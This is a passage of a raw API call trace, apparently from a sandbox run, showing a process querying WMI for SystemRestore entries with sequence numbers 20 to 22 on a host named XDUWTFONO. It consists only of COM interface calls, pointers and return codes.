[7]=0x90)), ppvObject=0x41dcfc | out: ppvObject=0x41dcfc*=0x0) returned 0x80004002 [0116.724] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738310, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41dd08 | out: ppvObject=0x41dd08*=0x77c458) returned 0x0 [0116.724] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x77c458, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x41dd10 | out: pCid=0x41dd10*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0116.724] WbemDefPath:IUnknown:Release (This=0x77c458) returned 0x3 [0116.724] CoGetContextToken (in: pToken=0x41dd68 | out: pToken=0x41dd68) returned 0x0 [0116.724] CoGetContextToken (in: pToken=0x41e170 | out: pToken=0x41e170) returned 0x0 [0116.724] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738310, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e200 | out: ppvObject=0x41e200*=0x0) returned 0x80004002 [0116.724] WbemDefPath:IUnknown:Release (This=0x6738310) returned 0x2 [0116.724] WbemDefPath:IUnknown:Release (This=0x6738310) returned 0x1 [0116.724] CoGetContextToken (in: pToken=0x41eaf8 | out: pToken=0x41eaf8) returned 0x0 [0116.724] CoGetContextToken (in: pToken=0x41ea58 | out: pToken=0x41ea58) returned 0x0 [0116.724] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738310, riid=0x41eb28*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x41eb24 | out: ppvObject=0x41eb24*=0x6738310) returned 0x0 [0116.724] WbemDefPath:IUnknown:AddRef (This=0x6738310) returned 0x3 [0116.724] WbemDefPath:IUnknown:Release (This=0x6738310) returned 0x2 [0116.724] WbemDefPath:IWbemPath:SetText (This=0x6738310, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=20") returned 0x0 [0116.724] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6730c70, puCount=0x41eca8 | out: puCount=0x41eca8*=0x2) returned 0x0 [0116.724] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41eca4*=0x0, pszText=0x0 | out: puBuffLength=0x41eca4*=0x11, pszText=0x0) returned 0x0 [0116.724] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41eca4*=0x11, pszText="0000000000000000" | out: puBuffLength=0x41eca4*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0116.724] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6730c70, puCount=0x41ec74 | out: puCount=0x41ec74*=0x2) returned 0x0 [0116.724] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41ec70*=0x0, pszText=0x0 | out: puBuffLength=0x41ec70*=0x11, pszText=0x0) returned 0x0 [0116.724] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41ec70*=0x11, pszText="0000000000000000" | out: puBuffLength=0x41ec70*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0116.724] IWbemClassObject:Get (in: This=0x673b930, wszName="sequencenumber", lFlags=0, pVal=0x41ec70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3530090*=0, plFlavor=0x3530094*=0 | out: pVal=0x41ec70*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x14, varVal2=0x0), pType=0x3530090*=19, plFlavor=0x3530094*=0) returned 0x0 [0116.725] IWbemClassObject:Get (in: This=0x673b930, wszName="sequencenumber", lFlags=0, pVal=0x41ec78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3530090*=19, plFlavor=0x3530094*=0 | out: pVal=0x41ec78*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x14, varVal2=0x0), pType=0x3530090*=19, plFlavor=0x3530094*=0) returned 0x0 [0116.725] CoTaskMemAlloc (cb=0x4) returned 0x77c498 [0116.725] IEnumWbemClassObject:Next (in: This=0x6736ac4, lTimeout=-1, uCount=0x1, apObjects=0x77c498, puReturned=0x3526b58 | out: apObjects=0x77c498*=0x673bac8, puReturned=0x3526b58*=0x1) returned 0x0 [0116.725] IUnknown:QueryInterface (in: This=0x673bac8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e2e0 | out: ppvObject=0x41e2e0*=0x673bac8) returned 0x0 [0116.725] IUnknown:QueryInterface (in: This=0x673bac8, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x41e29c | out: ppvObject=0x41e29c*=0x0) returned 0x80004002 [0116.725] IUnknown:QueryInterface (in: This=0x673bac8, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x41e0bc | out: ppvObject=0x41e0bc*=0x0) returned 0x80004002 [0116.726] IUnknown:AddRef (This=0x673bac8) returned 0x3 [0116.726] IUnknown:QueryInterface (in: This=0x673bac8, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x41dbfc | out: ppvObject=0x41dbfc*=0x0) returned 0x80004002 [0116.726] IUnknown:QueryInterface (in: This=0x673bac8, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x41dbac | out: ppvObject=0x41dbac*=0x0) returned 0x80004002 [0116.726] IUnknown:QueryInterface (in: This=0x673bac8, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41dbb8 | out: ppvObject=0x41dbb8*=0x673bacc) returned 0x0 [0116.726] IMarshal:GetUnmarshalClass (in: This=0x673bacc, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x41dbc0 | out: pCid=0x41dbc0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0116.726] IUnknown:Release (This=0x673bacc) returned 0x3 [0116.726] CoGetContextToken (in: pToken=0x41dc18 | out: pToken=0x41dc18) returned 0x0 [0116.726] CoGetContextToken (in: pToken=0x41e020 | out: pToken=0x41e020) returned 0x0 [0116.726] IUnknown:QueryInterface (in: This=0x673bac8, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e0b0 | out: ppvObject=0x41e0b0*=0x0) returned 0x80004002 [0116.726] IUnknown:Release (This=0x673bac8) returned 0x2 [0116.726] CoGetContextToken (in: pToken=0x41e5f0 | out: pToken=0x41e5f0) returned 0x0 [0116.726] CoGetContextToken (in: pToken=0x41e550 | out: pToken=0x41e550) returned 0x0 [0116.726] IUnknown:QueryInterface (in: This=0x673bac8, riid=0x41e620*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x41e61c | out: ppvObject=0x41e61c*=0x673bac8) returned 0x0 [0116.726] IUnknown:AddRef (This=0x673bac8) returned 0x4 [0116.726] IUnknown:Release (This=0x673bac8) returned 0x3 [0116.726] IUnknown:Release (This=0x673bac8) returned 0x2 [0116.726] CoTaskMemFree (pv=0x77c498) [0116.726] CoGetContextToken (in: pToken=0x41e958 | out: pToken=0x41e958) returned 0x0 [0116.726] IUnknown:AddRef (This=0x673bac8) returned 0x3 [0116.727] IWbemClassObject:Get (in: This=0x673bac8, wszName="__GENUS", lFlags=0, pVal=0x41ec6c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x41ecec*=0, plFlavor=0x41ece8*=0 | out: pVal=0x41ec6c*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x41ecec*=3, plFlavor=0x41ece8*=64) returned 0x0 [0116.727] IWbemClassObject:Get (in: This=0x673bac8, wszName="__PATH", lFlags=0, pVal=0x41ec50*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x41ecd4*=0, plFlavor=0x41ecd0*=0 | out: pVal=0x41ec50*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=21", varVal2=0x0), pType=0x41ecd4*=8, plFlavor=0x41ecd0*=64) returned 0x0 [0116.727] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=21") returned 0x70 [0116.727] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=21") returned 0x70 [0116.727] CoGetObjectContext (in: riid=0x346e308*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x41ec7c | out: ppv=0x41ec7c*=0x72015c) returned 0x0 [0116.727] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x41ec74 | out: pAptType=0x41ec74*=1) returned 0x0 [0116.727] IUnknown:QueryInterface (in: This=0x72015c, riid=0x346e2f0*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x41ec78 | out: ppvObject=0x41ec78*=0x0) returned 0x80004002 [0116.727] IUnknown:Release (This=0x72015c) returned 0x1 [0116.728] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x41e5e8 | out: ppv=0x41e5e8*=0x6736e98) returned 0x0 [0116.728] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736e98, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x41e800 | out: ppvObject=0x41e800*=0x0) returned 0x80004002 [0116.728] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6736e98, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e814 | out: ppvObject=0x41e814*=0x6738380) returned 0x0 [0116.728] WbemDefPath:IUnknown:Release (This=0x6736e98) returned 0x0 [0116.728] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738380, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e434 | out: ppvObject=0x41e434*=0x6738380) returned 0x0 [0116.728] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738380, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x41e3f0 | out: ppvObject=0x41e3f0*=0x0) returned 0x80004002 [0116.728] WbemDefPath:IUnknown:AddRef (This=0x6738380) returned 0x3 [0116.728] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738380, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x41dd4c | out: ppvObject=0x41dd4c*=0x0) returned 0x80004002 [0116.728] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738380, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x41dcfc | out: ppvObject=0x41dcfc*=0x0) returned 0x80004002 [0116.728] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738380, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41dd08 | out: ppvObject=0x41dd08*=0x77c498) returned 0x0 [0116.728] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x77c498, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x41dd10 | out: pCid=0x41dd10*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0116.728] WbemDefPath:IUnknown:Release (This=0x77c498) returned 0x3 [0116.728] CoGetContextToken (in: pToken=0x41dd68 | out: pToken=0x41dd68) returned 0x0 [0116.729] CoGetContextToken (in: pToken=0x41e170 | out: pToken=0x41e170) returned 0x0 [0116.729] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738380, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e200 | out: ppvObject=0x41e200*=0x0) returned 0x80004002 [0116.729] WbemDefPath:IUnknown:Release (This=0x6738380) returned 0x2 [0116.729] WbemDefPath:IUnknown:Release (This=0x6738380) returned 0x1 [0116.729] CoGetContextToken (in: pToken=0x41eaf8 | out: pToken=0x41eaf8) returned 0x0 [0116.729] CoGetContextToken (in: pToken=0x41ea58 | out: pToken=0x41ea58) returned 0x0 [0116.729] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738380, riid=0x41eb28*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x41eb24 | out: ppvObject=0x41eb24*=0x6738380) returned 0x0 [0116.729] WbemDefPath:IUnknown:AddRef (This=0x6738380) returned 0x3 [0116.729] WbemDefPath:IUnknown:Release (This=0x6738380) returned 0x2 [0116.729] WbemDefPath:IWbemPath:SetText (This=0x6738380, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=21") returned 0x0 [0116.729] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6730c70, puCount=0x41eca8 | out: puCount=0x41eca8*=0x2) returned 0x0 [0116.729] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41eca4*=0x0, pszText=0x0 | out: puBuffLength=0x41eca4*=0x11, pszText=0x0) returned 0x0 [0116.729] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41eca4*=0x11, pszText="0000000000000000" | out: puBuffLength=0x41eca4*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0116.729] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6730c70, puCount=0x41ec74 | out: puCount=0x41ec74*=0x2) returned 0x0 [0116.729] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41ec70*=0x0, pszText=0x0 | out: puBuffLength=0x41ec70*=0x11, pszText=0x0) returned 0x0 [0116.729] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41ec70*=0x11, pszText="0000000000000000" | out: puBuffLength=0x41ec70*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0116.729] IWbemClassObject:Get (in: This=0x673bac8, wszName="sequencenumber", lFlags=0, pVal=0x41ec70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x35308e0*=0, plFlavor=0x35308e4*=0 | out: pVal=0x41ec70*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x15, varVal2=0x0), pType=0x35308e0*=19, plFlavor=0x35308e4*=0) returned 0x0 [0116.729] IWbemClassObject:Get (in: This=0x673bac8, wszName="sequencenumber", lFlags=0, pVal=0x41ec78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x35308e0*=19, plFlavor=0x35308e4*=0 | out: pVal=0x41ec78*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x15, varVal2=0x0), pType=0x35308e0*=19, plFlavor=0x35308e4*=0) returned 0x0 [0116.729] CoTaskMemAlloc (cb=0x4) returned 0x77c4d8 [0116.729] IEnumWbemClassObject:Next (in: This=0x6736ac4, lTimeout=-1, uCount=0x1, apObjects=0x77c4d8, puReturned=0x3526b58 | out: apObjects=0x77c4d8*=0x673bc60, puReturned=0x3526b58*=0x1) returned 0x0 [0116.730] IUnknown:QueryInterface (in: This=0x673bc60, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e2e0 | out: ppvObject=0x41e2e0*=0x673bc60) returned 0x0 [0116.730] IUnknown:QueryInterface (in: This=0x673bc60, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x41e29c | out: ppvObject=0x41e29c*=0x0) returned 0x80004002 [0116.730] IUnknown:QueryInterface (in: This=0x673bc60, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x41e0bc | out: ppvObject=0x41e0bc*=0x0) returned 0x80004002 [0116.730] IUnknown:AddRef (This=0x673bc60) returned 0x3 [0116.730] IUnknown:QueryInterface (in: This=0x673bc60, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x41dbfc | out: ppvObject=0x41dbfc*=0x0) returned 0x80004002 [0116.730] IUnknown:QueryInterface (in: This=0x673bc60, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x41dbac | out: ppvObject=0x41dbac*=0x0) returned 0x80004002 [0116.730] IUnknown:QueryInterface (in: This=0x673bc60, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41dbb8 | out: ppvObject=0x41dbb8*=0x673bc64) returned 0x0 [0116.730] IMarshal:GetUnmarshalClass (in: This=0x673bc64, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x41dbc0 | out: pCid=0x41dbc0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0116.730] IUnknown:Release (This=0x673bc64) returned 0x3 [0116.730] CoGetContextToken (in: pToken=0x41dc18 | out: pToken=0x41dc18) returned 0x0 [0116.730] CoGetContextToken (in: pToken=0x41e020 | out: pToken=0x41e020) returned 0x0 [0116.730] IUnknown:QueryInterface (in: This=0x673bc60, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e0b0 | out: ppvObject=0x41e0b0*=0x0) returned 0x80004002 [0116.730] IUnknown:Release (This=0x673bc60) returned 0x2 [0116.731] CoGetContextToken (in: pToken=0x41e5f0 | out: pToken=0x41e5f0) returned 0x0 [0116.731] CoGetContextToken (in: pToken=0x41e550 | out: pToken=0x41e550) returned 0x0 [0116.731] IUnknown:QueryInterface (in: This=0x673bc60, riid=0x41e620*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x41e61c | out: ppvObject=0x41e61c*=0x673bc60) returned 0x0 [0116.731] IUnknown:AddRef (This=0x673bc60) returned 0x4 [0116.731] IUnknown:Release (This=0x673bc60) returned 0x3 [0116.731] IUnknown:Release (This=0x673bc60) returned 0x2 [0116.731] CoTaskMemFree (pv=0x77c4d8) [0116.731] CoGetContextToken (in: pToken=0x41e958 | out: pToken=0x41e958) returned 0x0 [0116.731] IUnknown:AddRef (This=0x673bc60) returned 0x3 [0116.731] IWbemClassObject:Get (in: This=0x673bc60, wszName="__GENUS", lFlags=0, pVal=0x41ec6c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x41ecec*=0, plFlavor=0x41ece8*=0 | out: pVal=0x41ec6c*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x41ecec*=3, plFlavor=0x41ece8*=64) returned 0x0 [0116.731] IWbemClassObject:Get (in: This=0x673bc60, wszName="__PATH", lFlags=0, pVal=0x41ec50*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x41ecd4*=0, plFlavor=0x41ecd0*=0 | out: pVal=0x41ec50*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=22", varVal2=0x0), pType=0x41ecd4*=8, plFlavor=0x41ecd0*=64) returned 0x0 [0116.731] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=22") returned 0x70 [0116.731] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=22") returned 0x70 [0116.731] CoGetObjectContext (in: riid=0x346e308*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x41ec7c | out: ppv=0x41ec7c*=0x72015c) returned 0x0 [0116.731] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x41ec74 | out: pAptType=0x41ec74*=1) returned 0x0 [0116.731] IUnknown:QueryInterface (in: This=0x72015c, riid=0x346e2f0*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x41ec78 | out: ppvObject=0x41ec78*=0x0) returned 0x80004002 [0116.731] IUnknown:Release (This=0x72015c) returned 0x1 [0116.732] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x41e5e8 | out: ppv=0x41e5e8*=0x6736ea8) returned 0x0 [0116.732] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736ea8, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x41e800 | out: ppvObject=0x41e800*=0x0) returned 0x80004002 [0116.732] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6736ea8, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e814 | out: ppvObject=0x41e814*=0x67383f0) returned 0x0 [0116.732] WbemDefPath:IUnknown:Release (This=0x6736ea8) returned 0x0 [0116.732] WbemDefPath:IUnknown:QueryInterface (in: This=0x67383f0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e434 | out: ppvObject=0x41e434*=0x67383f0) returned 0x0 [0116.732] WbemDefPath:IUnknown:QueryInterface (in: This=0x67383f0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x41e3f0 | out: ppvObject=0x41e3f0*=0x0) returned 0x80004002 [0116.732] WbemDefPath:IUnknown:AddRef (This=0x67383f0) returned 0x3 [0116.733] WbemDefPath:IUnknown:QueryInterface (in: This=0x67383f0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, 